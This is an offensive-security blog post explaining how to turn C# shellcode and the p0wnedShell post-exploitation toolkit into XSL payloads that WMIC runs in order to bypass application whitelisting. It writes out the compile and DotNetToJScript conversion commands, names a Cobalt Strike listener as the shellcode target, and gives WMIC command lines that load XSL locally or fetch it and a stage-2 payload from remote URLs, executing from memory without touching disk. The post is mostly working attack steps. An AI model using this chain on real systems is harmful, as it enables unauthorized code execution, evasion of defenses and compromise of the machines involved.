In April 2018, Casey Smith published a finding he dubbed squiblytwo, which detailed how WMIC can be used to invoke arbitary code contained in the extensible stylesheet language (XSL) format.

The technique has some notable attractions:

  • AWL bypass
  • Execute when Windows Script Host is blocked
  • Utilise JScript (DotNetToJScript hotness)
  • Load XSL locally or from a URL
  • WMIC is proxy aware (and works over TLS)

I encourage you to read through Casey’s original post before proceeding here.

The goal of this post is to walk through how you can take your own C#, run it through DotNetToJScript, and throw the output into XSL format.

Example 1

32-bit Shellcode

For this example we’re going to execute 32-bit shellcode for a Cobalt Strike HTTP listener, using Arno0x0x’s shellcodeLauncher as a template. The only thing we need to add is a constructor for the Program class.

Replace line 25 with your shellcode of choice.

Compile to DLL

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -unsafe -platform:x86 -target:library shellcode.cs

It’s probably good practice to test your payload every step of the way. So before compiling to a DLL, compile to an EXE and run it to make sure it works as expected.

DotNetToJScript

Next, provide the DLL to DotNetToJScript. Remember to modify the entry class if you’re using a different namespace and class name.

DotNetToJScript.exe -c ShellCodeLauncher.Program -o C:\Tools\shellcode.js C:\Tools\shellcode.dll

You can test the js file using cscript but because we’re outputting to 32-bit, we need to use the one in SysWOW64.

C:\Windows\SysWOW64\cscript.exe C:\Tools\shellcode.js

XSL

The final step is to wrap the js in the tags required by XSL. We can use the squiblytwo PoC as a template.

Final result should look something like this.

Again, because it’s 32-bit, we need the SysWOW64 wmic to execute.

C:\Windows\SysWOW64\wbem\WMIC.exe os get /format:"C:\Tools\shellcode.xsl"

Example 2

p0wnedShell

p0wnedShell is a well-known PowerShell runspace post exploitation toolkit written in C#, that can run PowerShell commands and functions within a runspace environment without using powershell.exe. p0wnedLoader is probably less well know and is not maintained with the main p0wnedShell repo. It enables you to download an AES encrypted version of p0wnedShell, decrypt it, then run it from memory.

For the purposes of this post, we’ll just use the old p0wnedShell in the p0wnedLoader repo - of course, you can compile and encrypt your own version with p0wnedEncrypt.

As before, modify p0wnedLoader to provide a constructor for DotNetToJScript, then repeat the same steps in Example 1 to compile p0wnedLoader.cs to a DLL, run DotNetToJScript and put it in XSL format.

If we also host the XSL online, we can run the entire thing without touching disk.

C:\Windows\System32\wbem\WMIC.exe os get /format:"https://raw.githubusercontent.com/rasta-mouse/p0wnedLoader/master/p0wnedLoader.xsl"

          ___                     ____                __
    ___  / _ \_    _____  ___ ___/ / /  ___  ___ ____/ /__ ____
   / _ \/ // / |/|/ / _ \/ -_) _  / /__/ _ \/ _ `/ _  / -_) __/
  / .__/\___/|__,__/_//_/\__/\_,_/____/\___/\_,_/\_,_/\__/_/
 /_/

           Loads an Online AES Encrypted version of p0wnedShell
                                                By Cn33liz 2016


[*] Please enter the p0wnedShell Stage2 URL > https://raw.githubusercontent.com/Cn33liz/p0wnedLoader/master/p0wnedShellx64.enc

[*] One moment while getting our Stage2 payload.... -> Done

[*] Now please enter our Decryption Password > **********

Et voila.